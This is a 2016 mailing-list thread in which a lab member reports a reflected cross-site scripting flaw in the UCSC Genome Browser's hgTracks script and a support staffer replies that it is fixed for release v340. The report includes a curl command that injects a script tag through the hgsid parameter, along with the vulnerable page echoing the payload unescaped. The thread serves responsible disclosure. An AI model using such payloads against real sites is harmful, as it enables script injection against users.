Security Issue with Genome Browser

10 views
Skip to first unread message

Elliott, Oliver T.

unread,
Sep 30, 2016, 2:22:14 PM9/30/16
to gen...@soe.ucsc.edu
Hello!

 Our lab is running a local installation of the genome browser and our security dept. has a identified a vulnerability in the browser's code. It seems the issue is that the input to, say, hgTracks or hgGateway is not sanitized in any way, and this leads to the possibility of cross site scripting, as in:

$ curl 'https://genome.ucsc.edu/cgi-bin/hgTracks?hgsid=%27%22()%26%25%3Cacv%3E%3CScRiPt%20%3Eprompt(911920)%3C/ScRiPt%3E'

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML><HEAD>
<TITLE>Very Early Error</TITLE>
<META http-equiv="Content-Script-Type" content="text/javascript">
<link rel='stylesheet' href='../style/HGStyle-v338.css' type='text/css'>
</HEAD>

<BODY CLASS="hgTracks cgi">
<script type='text/javascript'>
document.write("<center><div id='warnBox' style='display:none;'><CENTER><B id='warnHead'></B></CENTER><UL id='warnList'></UL><CENTER><button id='warnOK' onclick='hideWarnBox();return false;'></button></CENTER></div></center>");
function showWarnBox() {document.getElementById('warnOK').innerHTML='&nbsp;OK&nbsp;';var warnBox=document.getElementById('warnBox');warnBox.style.display=''; warnBox.style.width='65%';document.getElementById('warnHead').innerHTML='Warning/Error(s):';window.scrollTo(0, 0);}
function hideWarnBox() {var warnBox=document.getElementById('warnBox');warnBox.style.display='none';warnBox.innerHTML='';var endOfPage = document.body.innerHTML.substr(document.body.innerHTML.length-20);if(endOfPage.lastIndexOf('-- ERROR --') > 0) { history.back(); }}
window.onunload = function(){}; // Trick to avoid FF back button issue.
</script>
<!-- HGERROR-START -->
<P>invalid unsigned integer: "'"()&%<acv><ScRiPt >prompt(911920)</ScRiPt>"</P>
<!-- HGERROR-END -->
</BODY></HTML>

Just wanted to alert you to this problem and am wondering if there might be plans formed to patch it. Thanks!

Best,
Oliver

Cath Tyner

unread,
Sep 30, 2016, 6:25:59 PM9/30/16
to Elliott, Oliver T., gen...@soe.ucsc.edu
Hello Oliver,

Thank you so much for this report - this has been fixed and will appear in our upcoming release (v340), the afternoon of 10/25/16.

Please respond to this list if you have further questions!

Thank you again for your inquiry and for using the UCSC Genome Browser. 
​Please send new and follow-up questions to one of our UCSC Genome Browser mailing lists below:

  * Post to the Public Help Forum: E
mail 
gen...@soe.ucsc.edu
​ or search the Public Archives
​  * Post to the Mirror Help Forum: Email
 genome...@soe.ucsc.edu 
or search the Mirror Archives​
​  * Confidential/private help: Email
 genom...@soe.ucsc.edu

UCSC Genome Browser Announcements List (email alerts for new data & software):
  * Subscribe: Email genome-announce+subscribe@soe.ucsc.edu 
  * Unsubscribe: Email genome-announce+unsubscribe@soe.ucsc.edu

Join us on Social Media! FacebookTwitter, Wordpress BlogYouTube

​Enjoy,​
Cath
. . .
Cath Tyner
UCSC Genome Browser, Software QA & User Support
UC Santa Cruz Genomics Institute


--

---
You received this message because you are subscribed to the Google Groups "UCSC Genome Browser discussion list" group.
To unsubscribe from this group and stop receiving emails from it, send an email to genome+un...@soe.ucsc.edu.

Reply all
Reply to author
Forward
0 new messages